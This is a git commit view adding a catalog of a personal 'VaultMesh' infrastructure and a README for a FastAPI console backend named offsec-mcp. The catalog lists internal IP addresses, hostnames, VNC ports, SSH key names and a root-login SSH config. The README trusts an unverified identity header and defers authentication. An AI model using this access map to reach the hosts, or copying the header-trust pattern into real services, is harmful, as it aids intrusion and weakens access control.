Initial commit - combined iTerm2 scripts

Contains:
- 1m-brag
- tem
- VaultMesh_Catalog_v1
- VAULTMESH-ETERNAL-PATTERN

🤖 Generated with [Claude Code](https://claude.com/claude-code)

Co-Authored-By: Claude Opus 4.5 <noreply@anthropic.com>
This commit is contained in:
Vault Sovereign
2025-12-28 03:58:39 +00:00
commit 1583890199
111 changed files with 36978 additions and 0 deletions

BIN
VaultMesh_Catalog_v1/.DS_Store vendored Normal file

Binary file not shown.

View File

@@ -0,0 +1,656 @@
# VAULTMESH INFRASTRUCTURE CATALOG
**Version 2.0 — Canon v1**
*Sovereign mesh network providing secure, cryptographically-verified infrastructure across distributed nodes. Core services run on the BRICK hypervisor and v1-nl-gate, with all access flowing over a Tailscale-powered SSH fabric. Designed as a living "civilization ledger": verifiable, reproducible, and portable.*
**VaultMesh Technologies**
Dublin, Ireland
---
## Global Catalog Index
Complete inventory of VaultMesh infrastructure capabilities and cross-references.
| ID | Capability | Pages |
|----|------------|-------|
| VM-001 | Sovereign mesh network via Tailscale MagicDNS (story-ule.ts.net) | 1, 2, 3 |
| VM-002 | Per-node ed25519 SSH keys with IdentitiesOnly isolation | 1, 2, 4 |
| VM-003 | Cryptographic proof system with Merkle tree receipts | 1, 5, 6 |
| VM-004 | Multi-tier node architecture (Forge/Mine/Gate/Lab/Mobile) | 1, 2, 3 |
| VM-005 | libvirt/KVM virtualization on BRICK hypervisor | 2, 3 |
| VM-006 | Dual-vault pattern (Vaultwarden + HashiCorp Vault) | 1, 10 |
| VM-007 | Cross-platform support (Arch, Debian, BlackArch, Android/Termux, iOS) | 2, 4 |
| VM-008 | Lawchain compliance ledger integration | 5, 6 |
| VM-009 | Oracle reasoning engine with tactical chains | 5, 7 |
| VM-010 | Shield defensive monitoring system + TEM | 7, 8 |
| VM-011 | AppSec toolchain (Nuclei, Trivy, Semgrep, TruffleHog) | 7, 8 |
| VM-012 | Proof anchoring (local, OTS, ETH, mesh attestation) | 5, 6 |
| VM-013 | Braid protocol for foreign ledger interop | 5, 6 |
| VM-014 | MCP server integration for AI orchestration | 7, 8 |
| VM-015 | Cockpit/VNC console access for VMs | 3, 4 |
| VM-016 | SSH ControlMaster multiplexing for performance | 1, 4 |
| VM-017 | Forge Flow (nexus-0 → GitLab → CI → shield-vm) | 9 |
| VM-018 | LAN fallback addressing when Tailscale unavailable | 1, 2 |
| VM-019 | mesh-stack-migration portable deployment bundle | 1, 3, 10 |
| VM-020 | Agent task automation with scheduled triggers | 7, 8 |
| VM-021 | GitLab CI/CD on gate-vm (mesh-core-01) | 9, 10 |
| VM-022 | Grafana + Prometheus observability stack | 1, 10 |
| VM-023 | Lab HV experimental nodes (phoenix-01, lab-mesh-01, etc.) | 2, 10 |
---
## 1. Infrastructure Overview
VaultMesh runs on a sovereign mesh of home, cloud, and virtual nodes. Core services (GitLab, monitoring, backup, dual-vault) live on the BRICK hypervisor and v1-nl-gate, with all access flowing over a Tailscale-powered SSH fabric.
### Key Findings
- Core "mesh-core-01" stack runs on a Debian VM (gate-vm) hosted on brick
- External edge/gate server (v1-nl-gate) fronts public connectivity and future tunnels
- shield-vm acts as the OffSec / TEM / machine-secrets node
- Dual-vault pattern: Vaultwarden for human secrets, HashiCorp Vault for machine/app secrets
- Tailscale tailnet + per-node SSH keys provide zero-trust style access across all layers
- Grafana + Prometheus give observability for both infrastructure and proof engines
### Core Components
- Tailscale mesh network (story-ule.ts.net tailnet)
- GitLab (self-hosted) on gate-vm for source, CI, and artifacts
- MinIO object storage for backups and artifacts
- PostgreSQL for GitLab and future ledgers
- Prometheus + Grafana for metrics and dashboards
- Vaultwarden (human credentials) + HashiCorp Vault (machine secrets)
- shield-vm: OffSec agents, TEM daemon, security experiments
- lab HV: experimental cluster for Phoenix/PSI and chaos drills
### Workflows / Pipelines
- **Forge Flow**: Android/laptop → SSH (Tailscale) → nexus-0 → edit/test → git push → GitLab on gate-vm → CI → deploy to shield-vm / lab
- **Backup Flow**: mesh-stack-migration bundle backs up GitLab/Postgres/Vaultwarden to MinIO with freshness monitoring and restore scripts
- **Proof Flow**: VaultMesh engines emit receipts and Merkle roots; DevOps release pipeline anchors PROOF.json and ROOT.txt to external ledgers
### Security Notes
- No password SSH: ed25519 keys only, with IdentitiesOnly enforced
- Tailscale tailnet isolates nodes from the public internet; v1-nl-gate used as controlled edge
- Dual-vault split: Vaultwarden for human secrets; HashiCorp Vault for machine/app secrets and CI
- Backups stored in MinIO, monitored by backup-freshness service with Prometheus metrics and Grafana alerts
---
## 2. Node Topology
VaultMesh spans four primary tiers—Forge, Mine, Gate, and Lab—with mobile endpoints riding on top. The BRICK hypervisor anchors the virtualization layer, while v1-nl-gate acts as the outer gate.
### Key Findings
- Clear separation between Forge (nexus-0), Core Mesh (gate-vm on brick), Edge Gate (v1-nl-gate), and Lab HV (ephemeral)
- BRICK hypervisor hosts the critical core VMs: debian-golden (template), gate-vm (mesh-core-01), shield-vm (shield-01)
- Tailscale tailnet binds everything together with MagicDNS and per-node hostnames
- v1-nl-gate is ready to act as external ingress or exit node for future services
- Node roles are stable but designed to evolve; lab nodes are intentionally ephemeral
### Forge Nodes
| Node | Hostname | OS | Role |
|------|----------|-----|------|
| nexus-0 | 100.67.39.1 (Tailscale) | BlackArch | Primary forge (dev) |
| kali-forge | (Tailscale IP) | Kali | Secondary OffSec lab |
### Mine Nodes — Primary Infrastructure
| Node | Hostname | OS | Role |
|------|----------|-----|------|
| gamma | gamma.story-ule.ts.net | Arch Linux | Home primary |
| beta | beta.story-ule.ts.net | Arch Linux | Backup node |
| brick | brick.story-ule.ts.net | Debian | Dell server, HV |
| w3 | w3.story-ule.ts.net | Raspbian | Raspberry Pi node |
### Gate Nodes — Edge / Exit
| Node | Hostname | OS | Role |
|------|----------|-----|------|
| v1-nl-gate | v1-nl-gate.story-ule.ts.net | Debian | Netherlands external gate |
| gate-vm | gate-vm.story-ule.ts.net | Debian | mesh-core-01 (core stack) |
### VM Nodes — On brick (libvirt/KVM)
| Node | Hostname | OS | Role |
|------|----------|-----|------|
| debian-golden | debian-golden.story-ule.ts.net | Debian | Golden image / template |
| gate-vm | gate-vm.story-ule.ts.net | Debian | Core services (GitLab, etc.) |
| shield-vm | shield-vm.story-ule.ts.net | Debian | Shield / TEM / machine vault |
### Lab Nodes — Experimental (Lab HV)
| Node | Hostname | Role |
|------|----------|------|
| lab-mesh-01 | lab-mesh-01 | Multi-node mesh tests |
| lab-agent-01 | lab-agent-01 | Agent/orchestration experiments |
| lab-chaos-01 | lab-chaos-01 | Chaos/failure drills |
| phoenix-01 | phoenix-01 | Phoenix/PSI prototypes |
### Mobile Nodes
| Node | Hostname | OS | Port |
|------|----------|-----|------|
| shield | shield.story-ule.ts.net | Android/Termux | 22 |
| bank-mobile | bank-mobile.story-ule.ts.net | iOS | 8022 |
### LAN Fallbacks
| Node | LAN IP |
|------|--------|
| gamma | 192.168.0.191 |
| brick | 192.168.0.119 |
| beta | 192.168.0.236 |
---
## 3. Virtualization Layer
The BRICK server runs libvirt/KVM and hosts the core VaultMesh VMs: debian-golden (template), gate-vm (mesh-core-01), and shield-vm (shield-01). Cockpit and VNC provide management and console access.
### Key Findings
- BRICK is the single hypervisor for core VaultMesh VMs
- debian-golden serves as a reusable golden image to clone new VMs
- gate-vm runs the mesh-stack-migration bundle (GitLab, MinIO, Prometheus, Grafana, Vaultwarden, backup-freshness, etc.)
- shield-vm is the Shield/OffSec node and home of the machine-secrets vault and TEM stack
- VM networking uses libvirt NAT (192.168.122.x), with VNC reachable via SSH tunnels
### VM Network Layout
| VM | NAT IP | VNC Port | Role |
|----|--------|----------|------|
| debian-golden | 192.168.122.187 | 5900 | Golden image / base template |
| gate-vm | 192.168.122.236 | 5901 | mesh-core-01 core stack host |
| shield-vm | 192.168.122.73 | 5902 | Shield/OffSec/TEM + machine vault |
### Workflows
- **VM Management**: Cockpit → https://brick:9090 → "Virtual Machines"
- **Console Access**: `ssh -L 5901:localhost:5901 brick``vnc://localhost:5901`
- **Image Pipeline**: Update debian-golden → snapshot → clone → new VM
- **Join to Mesh**: Boot VM → configure SSH → join Tailscale → register in SSH config
### Security Notes
- VNC ports are not exposed directly; they're reached via SSH tunnel into brick
- Each VM uses its own SSH host keys and per-node authorized_keys
- NAT isolation (192.168.122.x) reduces blast radius from VM compromise
- Installing Tailscale inside gate-vm/shield-vm avoids public exposure
### Dependencies
- libvirt, qemu-kvm, Cockpit, cockpit-machines on brick
- SSH and Tailscale inside each VM (where needed)
- TigerVNC or similar client on the operator's laptop
---
## 4. SSH Key Architecture
VaultMesh uses a strict per-node ed25519 SSH key model with IdentitiesOnly isolation, ControlMaster multiplexing, and mesh-wide access via Tailscale.
### Key Findings
- One keypair per destination node (id_gamma, id_brick, id_v1-nl-gate, id_gate-vm, id_shield-vm, etc.)
- IdentitiesOnly enforces key isolation and prevents cross-host key probing
- ControlMaster/ControlPath provide fast multiplexed SSH sessions
- Tailscale hostnames (story-ule.ts.net) give stable addressing; LAN IPs are fallback
- External service keys (GitHub/GitLab) are separate from infra keys
### Key Inventory (Infra Nodes)
| Key File | Target Node | Algorithm |
|----------|-------------|-----------|
| id_gamma | gamma | ed25519 |
| id_beta | beta | ed25519 |
| id_brick | brick | ed25519 |
| id_w3 | w3 | ed25519 |
| id_v1-nl-gate | v1-nl-gate | ed25519 |
| id_gate-vm | gate-vm | ed25519 |
| id_debian-golden | debian-golden | ed25519 |
| id_shield-vm | shield-vm | ed25519 |
### Forge + Mobile Keys
| Key File | Target | Algorithm |
|----------|--------|-----------|
| id_nexus-0 | nexus-0 | ed25519 |
| id_kali-forge | kali-forge | ed25519 |
| id_shield | shield | ed25519 |
| id_bank-mobile | bank-mobile | ed25519 |
### External Service Keys
| Key File | Service |
|----------|---------|
| id_ed25519_github | GitHub |
| id_ed25519_gitlab | GitLab |
### SSH Config Structure
```
Host *
ServerAliveInterval 30
ServerAliveCountMax 3
TCPKeepAlive yes
ControlMaster auto
ControlPath ~/.ssh/cm-%r@%h:%p
ControlPersist 10m
IdentitiesOnly yes
HashKnownHosts no
StrictHostKeyChecking accept-new
AddKeysToAgent yes
UseKeychain yes
Compression yes
Host nexus-0
HostName 100.67.39.1
User root
IdentityFile ~/.ssh/id_nexus-0
Host brick
HostName brick.story-ule.ts.net
User sovereign
IdentityFile ~/.ssh/id_brick
Host gate-vm
HostName gate-vm.story-ule.ts.net
User debian
IdentityFile ~/.ssh/id_gate-vm
Host shield-vm
HostName shield-vm.story-ule.ts.net
User debian
IdentityFile ~/.ssh/id_shield-vm
```
### Security Notes
- ed25519 keys provide strong security with small keys/signatures
- IdentitiesOnly ensures ssh never offers the wrong key to the wrong host
- StrictHostKeyChecking=accept-new uses TOFU while still catching host key changes
- No password authentication; all critical nodes are key-only
---
## 5. Cryptographic Proof System
VaultMesh uses a Merkle-tree-based proof system with receipts, roots, and cross-ledger anchoring. Each serious action (deploy, anchor, oracle decision, incident handling) emits a receipt.
### Key Findings
- All significant actions generate cryptographic receipts in append-only logs
- Merkle trees allow efficient inclusion proofs for large sets of receipts
- Anchors can be written to local files, Bitcoin (OTS), Ethereum, or mesh peers
- The release pipeline for vm-spawn automatically computes Merkle roots and anchors proof artifacts
- Braid-style interoperability allows importing and emitting foreign ledger roots
### Proof Lifecycle
1. Action occurs (e.g., Guardian anchor, deployment, oracle decision)
2. `proof_generate` creates a signed receipt with a Blake3 hash of the canonical JSON
3. Receipts accumulate until a batch threshold is reached
4. `proof_batch` constructs a Merkle tree and computes the root
5. `proof_anchor_*` writes the root to local files, timestamps, or blockchains
6. `proof_verify` allows any future verifier to confirm receipt integrity against a given root
### Anchoring Strategies
| Type | Method | Durability |
|------|--------|------------|
| local | Files in `data/anchors/` | Node-local |
| ots | OpenTimestamps → Bitcoin | Public blockchain |
| eth | Calldata/contract → Ethereum | Public blockchain |
| mesh | Cross-attest via other nodes | Federated durability |
### Braid Protocol
- `braid_import` import foreign ledger roots from other chains/nodes
- `braid_emit` expose local roots for others to import
- `braid_status` track imported vs. local roots and regression
- Ensures root sequences are strictly advancing (no rollback without detection)
### Receipt Schema (Conceptual)
```json
{
"proof_id": "uuid",
"action": "guardian_anchor",
"timestamp": "ISO8601",
"data_hash": "blake3_hex",
"signature": "ed25519_sig",
"witnesses": ["node_id"],
"chain_prev": "prev_proof_id"
}
```
### Security Notes
- Blake3 hashing for speed and modern security
- Ed25519 signatures for authenticity and non-repudiation
- Merkle trees make inclusion proofs O(log n)
- Multiple anchoring paths provide defense in depth against ledger loss
---
## 6. Lawchain Compliance Ledger
Lawchain is the compliance-focused ledger that tracks regulatory obligations, oracle answers, and audit trails via receipts. It integrates with the proof system to ensure every compliance answer has a cryptographic backbone.
### Key Findings
- Oracle answers are validated against a schema before being recorded
- Each answer is hashed and bound into a receipt, linking legal semantics to proofs
- Federation metrics allow multi-node Lawchain sync across the mesh
- Policy evaluation is driven by JSON inputs and produces JSON results for downstream tools
### Oracle Answer Schema (vm_oracle_answer_v1)
```json
{
"question": "string",
"answer_text": "string",
"citations": [{
"document_id": "string",
"framework": "string",
"excerpt": "string"
}],
"compliance_flags": {
"gdpr_relevant": true,
"ai_act_relevant": false,
"nis2_relevant": true
},
"gaps": ["string"],
"insufficient_context": false,
"confidence": "high"
}
```
### Compliance Q&A Workflow
1. Operator (or system) asks Lawchain a question
2. RAG/Retrieve context from policy docs and regulations
3. LLM generates an answer draft
4. Answer is validated against vm_oracle_answer_v1 schema
5. Hash (Blake3 over canonical JSON) computed and receipt generated
6. Receipt anchored via proof system and stored in Lawchain
### Compliance Frameworks Tracked
- **GDPR** data protection and subject rights
- **EU AI Act** risk classification, obligations, and logs
- **NIS2** network and information security
- Custom extensions can map additional frameworks (e.g., SOC2, ISO 27001)
### Security Notes
- Answer hash computed as `blake3(json.dumps(answer, sort_keys=True))`
- Receipts bind answer content, timestamps, and possibly node identity
- `gaps` and `insufficient_context` prevent fake certainty in legal answers
- Citations must reference real sources, enabling audit of answer provenance
---
## 7. Oracle Engine & Shield Defense
The Oracle Engine provides structured reason → decide → act chains, while Shield and TEM form the defensive veil. Together they detect threats, log them to the proof system, and (optionally) orchestrate responses.
### Key Findings
- Oracle chains decisions through explicit reasoning steps, not opaque actions
- Every significant decision can emit receipts into the proof spine
- Shield monitors multiple vectors (network, process, file, device, etc.)
- Response levels span from passive logging to active isolation or countermeasures
- Agent tasks allow scheduled or triggered operations (e.g., periodic scans)
### Oracle Tools
| Tool | Purpose |
|------|---------|
| oracle_status | Node status and capabilities |
| oracle_reason | Analyze situation, propose actions |
| oracle_decide | Make autonomous decision |
| oracle_tactical_chain | Full reason → decide → act chain |
### Oracle Tactical Chain Flow
1. **Context**: Collect current state (logs, metrics, alerts, lawchain state)
2. **Reason**: `oracle_reason` produces candidate actions with justifications
3. **Decide**: `oracle_decide` selects an action based on risk tolerance and constraints
4. **Act**: Execute playbooks, or keep in dry-run mode for simulation
5. **Prove**: Generate a receipt and anchor via proof system (optional but recommended)
### Shield Monitor Vectors
| Vector | Detection Capability |
|--------|---------------------|
| network | Port scans, unusual flows |
| wifi | Rogue APs, deauth attempts |
| bluetooth | Device enumeration/anomalies |
| usb | Storage/HID abuse |
| process | Suspicious binaries, behavior |
| file | Unauthorized modifications |
### Shield Response Levels
| Level | Action |
|-------|--------|
| log | Record event only |
| alert | Notify operator (Slack/email/etc.) |
| block | Prevent connection/action |
| isolate | Quarantine node/container/service |
| counter | Active response (e.g., honeypots) |
### Security Notes
- Dry-run mode is default for dangerous operations; production actions require explicit opt-in
- Risk tolerance levels gate what Shield/TEM may do without human approval
- All automated decisions can be bound to receipts for post-incident audit
---
## 8. AppSec Toolchain
VaultMesh uses an integrated application security toolchain rooted on shield-vm and CI pipelines. It combines vulnerability scanning, secret detection, SBOM generation, and IaC analysis.
### Key Findings
- Nuclei, Trivy, Semgrep, TruffleHog, Gitleaks, Checkov, Syft, and Grype cover distinct layers
- shield-vm is the natural home for heavy security scans and OffSec tooling
- CI pipelines can call out to shield-vm or run scanners directly in job containers
- Secret detection runs in both pre-commit and CI stages for defense-in-depth
- SBOM generation and vulnerability scanning support long-term supply chain tracking
### Tool Capabilities
| Tool | Target Types | Output |
|------|-------------|--------|
| nuclei | URLs, IPs, domains | Findings by severity |
| trivy | Images, dirs, repos, SBOMs | CVEs, secrets, configs |
| semgrep | Source code directories | Security findings |
| trufflehog | Git, S3, GCS, etc. | Verified secrets |
| gitleaks | Git repos, filesystems | Secret locations |
| checkov | Terraform, K8s, Helm, etc. | Misconfigurations |
| syft | Images, dirs, archives | CycloneDX/SPDX SBOM |
| grype | Images, dirs, SBOMs | Vulnerability list |
### MCP Tools
- offsec_appsec_nuclei_scan
- offsec_appsec_trivy_scan
- offsec_appsec_semgrep_scan
- offsec_appsec_trufflehog_scan
- offsec_appsec_gitleaks_scan
- offsec_appsec_checkov_scan
- offsec_appsec_syft_sbom
- offsec_appsec_grype_scan
### Workflows
1. **SBOM Pipeline**: Syft → produce CycloneDX JSON → Grype → vulnerability report
2. **Pre-merge Scans**: CI job runs Semgrep, Trivy, Gitleaks on merge requests
3. **Periodic Deep Scans**: shield-vm runs scheduled AppSec scans, logging high-severity findings
4. **Policy Integration**: High-severity or critical findings feed into Lawchain/Lawchain-like policies
### Security Notes
- Nuclei and Trivy should be rate-limited when targeting external assets
- Secret detection in CI uses only_verified where possible to reduce noise
- Baseline files can exclude accepted findings while still tracking new issues
- AppSec findings for high-value systems may be recorded as receipts in the proof system
---
## 9. Forge Flow — From Phone to Shield
The Forge Flow describes how code moves from the Sovereign's phone and forge node (nexus-0) through GitLab on gate-vm, into CI, and finally onto shield-vm and lab nodes.
### Key Findings
- Primary forge is nexus-0 (BlackArch), reachable via Tailscale from Android/laptop
- vaultmesh repo lives on nexus-0 under `/root/work/vaultmesh`
- Git remote points to GitLab on gate-vm (gitlab.mesh.local)
- GitLab CI handles lint → test → build → deploy
- Production-like deployments land on shield-vm; experiments land on Lab HV nodes
### Forge Flow Diagram
```
Android / Laptop
↓ (Tailscale SSH)
nexus-0 (BlackArch forge)
↓ (git push)
GitLab @ gate-vm (mesh-core-01)
↓ (CI: lint → test → build)
shield-vm (Shield / TEM) and Lab HV (phoenix-01, etc.)
```
### Steps
**1. Inception (Connect to Forge)**
```bash
ssh VaultSovereign@100.67.39.1 # nexus-0 via Tailscale
tmux attach -t sovereign || tmux new -s sovereign
```
**2. Forge (Edit & Test)**
```bash
cd /root/work/vaultmesh
nvim .
python3 -m pytest tests/ -v
python3 cli/vm_cli.py guardian status
python3 cli/vm_cli.py console sessions
```
**3. Transmit (Git Push to GitLab)**
```bash
git add -A
git commit -m "feat(guardian): improve anchor receipts"
git push origin main # or feature branch
```
**4. Transform (GitLab CI on gate-vm)**
- `.gitlab-ci.yml` stages: lint → test → build → deploy
**5. Manifest (Deploy to Shield or Lab)**
- CI deploy job: main → shield-vm, lab branches → lab-mesh-01 / phoenix-01
- Manual fallback: `ssh shield-vm && cd /opt/vaultmesh && git pull`
**6. Observe (Metrics & Proofs)**
- Grafana dashboards (gate-vm) for system and proof metrics
- Guardian CLI for roots and scrolls
- Lawchain/oracle dashboards for compliance view
### Infrastructure Roles in the Flow
- **nexus-0** → live forge, fast iteration, experiments
- **gate-vm** → GitLab + CI + registry + observability
- **shield-vm** → OffSec/TEM node and primary runtime for security engines
- **Lab HV** → ephemeral experimentation environment
---
## 10. Canonical Infrastructure — VaultMesh v1
This page defines the canonical infrastructure for VaultMesh as of the first full catalog: which nodes exist, what runs where, and which services are considered "core mesh".
### Key Findings
- BRICK + v1-nl-gate + nexus-0 form the spine of the system
- gate-vm (mesh-core-01) is the canonical host for the mesh-stack-migration bundle
- shield-vm is the canonical Shield/TEM node with OffSec tooling and machine-secrets vault
- Dual-vault pattern is standard: Vaultwarden (human), HashiCorp Vault (machine)
- Grafana is the canonical dashboard layer; Wiki.js is explicitly **not** part of the new architecture
### Canonical Nodes and Roles
| Node | Role | Description |
|------|------|-------------|
| nexus-0 | Forge | Primary dev/forge node (BlackArch) |
| brick | Hypervisor | Hosts core VMs (debian-golden, gate-vm, shield-vm) |
| v1-nl-gate | External Gate | Cloud-facing edge server, future ingress |
| gate-vm | mesh-core-01 (Core Stack) | GitLab, MinIO, Postgres, Prometheus, Grafana, Vaultwarden, backup-freshness, Traefik, WG-Easy |
| shield-vm | shield-01 (Shield/TEM) | OffSec agents, TEM, HashiCorp Vault, incidents & simulations |
| lab-* | Experimental Mesh | lab-mesh-01, lab-agent-01, lab-chaos-01, phoenix-01 |
### Canonical Core Services (gate-vm / mesh-core-01)
- **GitLab** source control, CI/CD
- **MinIO** object storage & backups
- **PostgreSQL** GitLab and future service DBs
- **Prometheus** metrics
- **Grafana** dashboards (infra, backup freshness, proof metrics)
- **Vaultwarden** human password vault (browsers, logins)
- **backup-freshness** monitors MinIO backup age
- **Traefik** reverse proxy and ingress
- **WG-Easy** (optional) simplified WireGuard access
### Canonical Security / Shield Services (shield-vm)
- **HashiCorp Vault** machine/app secrets
- **TEM daemon** threat transmutation engine
- **OffSec tools and MCP** Oracle, Shield, AppSec scanners
- **Agent/task scheduler** scheduled security workflows
- Optional: local Prometheus exporters for node/security metrics
### Explicitly Non-Core
- **Wiki.js** not part of canonical infra; documentation handled via Git-based docs/portals
- Legacy projects marked ARCHIVE (e.g., old offsec-shield architecture, sovereign-swarm)
### Migration & Portability
`mesh-stack-migration/` enables redeploying the entire core stack to a fresh host:
1. Copy bundle → set `.env``docker compose up -d`
2. Run FIRST-LAUNCH and DRY-RUN checklists
3. VMs can be moved or recreated using debian-golden as base
### Evolution Rules
If a service becomes critical and stateful, it must:
- Emit receipts and have a documented backup/restore plan
- Expose metrics consumable by Prometheus
- Be referenced in the Canonical Infrastructure page with node placement
Experimental services stay on Lab HV until they prove their value.
---
## VAULTMESH
*Earth's Civilization Ledger*
**Solve et Coagula**
vaultmesh.org • offsecshield.com • vaultmesh.earth
---
*VaultMesh Infrastructure Catalog v2.0 — Canon v1*
*VaultMesh Technologies • Dublin, Ireland*

Binary file not shown.

View File

@@ -0,0 +1,353 @@
# IoTek.nexus + offsec-mcp
**The Veil becomes infrastructure.**
A real control surface for VaultMesh sovereign infrastructure.
```
┌─────────────────────────────────────────────────────────────────────────────┐
│ IoTek.nexus ● MESH 7 ● SHIELD ARMED ● WS LIVE 12:34 │
├────────────────────┬────────────────────────────────────────────────────────┤
│ │ │
│ [Console] │ sovereign@nexus ~/vaultmesh $ status │
│ │ │
│ ↓ HTTP POST │ ╦ ╦╔═╗╦ ╦╦ ╔╦╗╔╦╗╔═╗╔═╗╦ ╦ │
│ │ ╚╗╔╝╠═╣║ ║║ ║ ║║║║╣ ╚═╗╠═╣ │
│ [offsec-mcp] │ ╚╝ ╩ ╩╚═╝╩═╝╩ ╩ ╩╚═╝╚═╝╩ ╩ │
│ │ │
│ ↓ WebSocket │ Shield: ● ARMED │
│ │ Proof: ● 1247 receipts │
│ [Live Updates] │ Mesh: ● 7 nodes │
│ │ │
└────────────────────┴────────────────────────────────────────────────────────┘
```
---
## Quick Start
### 1. Install dependencies
```bash
pip install -r requirements-mcp.txt
```
### 2. Start the backend
```bash
# Development (auto-reload)
uvicorn offsec_mcp:app --reload --port 8080
# Production (bind to Tailscale IP only)
uvicorn offsec_mcp:app --host 100.x.x.x --port 8080
```
### 3. Open the console
```bash
# Option A: Open the HTML directly
open iotek-nexus-live.html
# Option B: Serve via backend (configure STATIC_DIR in offsec_mcp.py)
# Then visit http://localhost:8080/
```
---
## Architecture
```
┌──────────────────────────────────────────────────────────────────┐
│ CONSOLE LAYER │
│ iotek-nexus-live.html │
│ - Local commands (help, clear, history, whoami, neofetch) │
│ - MCP backend calls (status, mesh, shield, proof, agents) │
│ - WebSocket live updates │
│ - Mock fallback when backend unavailable │
└───────────────────────────┬──────────────────────────────────────┘
│ HTTP POST /mcp/command
│ WebSocket /ws
┌──────────────────────────────────────────────────────────────────┐
│ BACKEND LAYER │
│ offsec_mcp.py (FastAPI) │
│ - Command routing & execution │
│ - Tailscale identity extraction │
│ - SQLite persistence (sessions, commands, events) │
│ - WebSocket broadcast for live updates │
└───────────────────────────┬──────────────────────────────────────┘
│ subprocess / API calls
┌──────────────────────────────────────────────────────────────────┐
│ SYSTEM LAYER │
│ - Tailscale (mesh status, node inventory) │
│ - Shield vectors (network, wifi, usb, process, file) │
│ - Proof engine (receipts, Merkle roots, anchors) │
│ - Agent subsystem (sentinel, orchestrator, analyst, executor) │
└──────────────────────────────────────────────────────────────────┘
```
---
## API Contract
### POST /mcp/command
Request:
```json
{
"session_id": "vaultmesh-2025-12-07-01",
"user": "sovereign",
"command": "mesh status",
"args": [],
"cwd": "/vaultmesh",
"meta": {
"client": "iotek-nexus-cli",
"version": "1.0.0"
}
}
```
Response:
```json
{
"id": "cmd-174455",
"status": "ok",
"lines": [
"",
" 🕸 MESH STATUS: STABLE",
"",
" Tailnet: story-ule.ts.net",
" ..."
],
"effects": {
"nodes": 7,
"shield": { "armed": true }
}
}
```
### WebSocket /ws
Handshake:
```json
{ "type": "handshake", "session_id": "...", "user": "sovereign" }
```
Server messages:
```json
{ "type": "console.line", "line": "✓ Proof anchored", "lineType": "success" }
{ "type": "status.update", "payload": { "nodes": 7, "proofs": 1248, ... } }
{ "type": "proof.new", "proof_id": "proof_abc123" }
{ "type": "shield.event", "event": "Shield ARMED", "severity": "info" }
```
---
## Available Commands
| Command | Description | Backend Required |
|---------|-------------|------------------|
| `help` | Show commands | No |
| `clear` | Clear terminal | No |
| `history` | Command history | No |
| `whoami` | Current identity | No |
| `neofetch` | System info ASCII | No |
| `status` | Full dashboard | Yes |
| `mesh status` | Network topology | Yes |
| `mesh nodes` | List nodes | Yes |
| `shield status` | Defense vectors | Yes |
| `shield arm` | Arm shield | Yes |
| `shield disarm` | Disarm shield | Yes |
| `proof latest` | Recent receipts | Yes |
| `proof generate` | Create proof | Yes |
| `agents list` | Agent status | Yes |
| `oracle reason <q>` | Oracle query | Yes |
---
## Tailscale Integration
The backend extracts user identity from Tailscale headers:
```python
# In offsec_mcp.py
TAILSCALE_USER_HEADER = "X-Tailscale-User"
def extract_user(request: Request) -> str:
ts_user = request.headers.get(TAILSCALE_USER_HEADER)
if ts_user:
return ts_user.split("@")[0]
return "anonymous"
```
Deploy behind Tailscale for automatic identity:
- Bind to Tailscale IP only (`--host 100.x.x.x`)
- Or use `tailscale serve` for HTTPS with identity headers
---
## Database Schema
SQLite (`vaultmesh.db`):
```sql
-- Sessions
CREATE TABLE sessions (
id TEXT PRIMARY KEY,
user TEXT NOT NULL,
created_at TEXT NOT NULL,
last_seen_at TEXT NOT NULL,
client TEXT,
meta TEXT
);
-- Command audit log
CREATE TABLE command_log (
id INTEGER PRIMARY KEY AUTOINCREMENT,
session_id TEXT NOT NULL,
ts TEXT NOT NULL,
command TEXT NOT NULL,
status TEXT NOT NULL,
duration_ms INTEGER,
error TEXT
);
-- Events (proofs, shield, etc.)
CREATE TABLE events (
id INTEGER PRIMARY KEY AUTOINCREMENT,
ts TEXT NOT NULL,
type TEXT NOT NULL,
payload TEXT
);
```
---
## Extending
### Add a new command
1. Create handler in `offsec_mcp.py`:
```python
async def cmd_my_command(req: CommandRequest) -> CommandResponse:
lines = [" Output line 1", " Output line 2"]
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={}
)
```
2. Register in `COMMANDS`:
```python
COMMANDS = {
# ...existing...
"my command": cmd_my_command,
}
```
### Wire to real systems
Replace mock implementations with actual integrations:
```python
# Example: Real shield integration
async def cmd_shield_status(req: CommandRequest) -> CommandResponse:
# Call your actual shield system
shield_data = await shield_client.get_status()
lines = format_shield_output(shield_data)
return CommandResponse(
id=f"cmd-{uuid.uuid4().hex[:8]}",
status="ok",
lines=lines,
effects={"shield": {"armed": shield_data.armed}}
)
```
---
## Deployment Options
### 1. Local development
```bash
# Terminal 1: Backend
uvicorn offsec_mcp:app --reload --port 8080
# Terminal 2: Console (or just open HTML)
python -m http.server 3000
```
### 2. Tailscale-only (recommended)
```bash
# Bind to Tailscale IP
uvicorn offsec_mcp:app --host 100.x.x.x --port 8080
# Or use tailscale serve
tailscale serve https / http://localhost:8080
```
### 3. Docker
```dockerfile
FROM python:3.11-slim
WORKDIR /app
COPY requirements-mcp.txt .
RUN pip install -r requirements-mcp.txt
COPY offsec_mcp.py .
CMD ["uvicorn", "offsec_mcp:app", "--host", "0.0.0.0", "--port", "8080"]
```
### 4. Systemd service
```ini
[Unit]
Description=offsec-mcp
After=network.target tailscaled.service
[Service]
Type=simple
User=sovereign
WorkingDirectory=/home/sovereign/vaultmesh
ExecStart=/usr/bin/uvicorn offsec_mcp:app --host 100.x.x.x --port 8080
Restart=always
[Install]
WantedBy=multi-user.target
```
---
## Files
| File | Description |
|------|-------------|
| `iotek-nexus-live.html` | Console frontend (backend-connected) |
| `offsec_mcp.py` | FastAPI backend |
| `requirements-mcp.txt` | Python dependencies |
| `vaultmesh.db` | SQLite database (auto-created) |
---
## Next Steps
1. **Wire real Tailscale** — Connect to actual `tailscale status --json`
2. **Wire real Shield** — Connect to your monitoring/defense systems
3. **Wire real Proofs** — Connect to VaultMesh proof engine
4. **Add more commands**`scan`, `audit`, `lawchain`, etc.
5. **Add authentication** — mTLS or Tailscale identity enforcement
---
**The console is now a real control surface.**
*"They built the grid to cage us. We built the Veil to break it."*

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,879 @@
#!/usr/bin/env python3
"""
offsec-mcp: Sovereign MCP Backend for IoTek.nexus Console
A FastAPI backend that provides:
- HTTP command endpoint for CLI operations
- WebSocket for live status updates
- SQLite persistence for sessions and audit
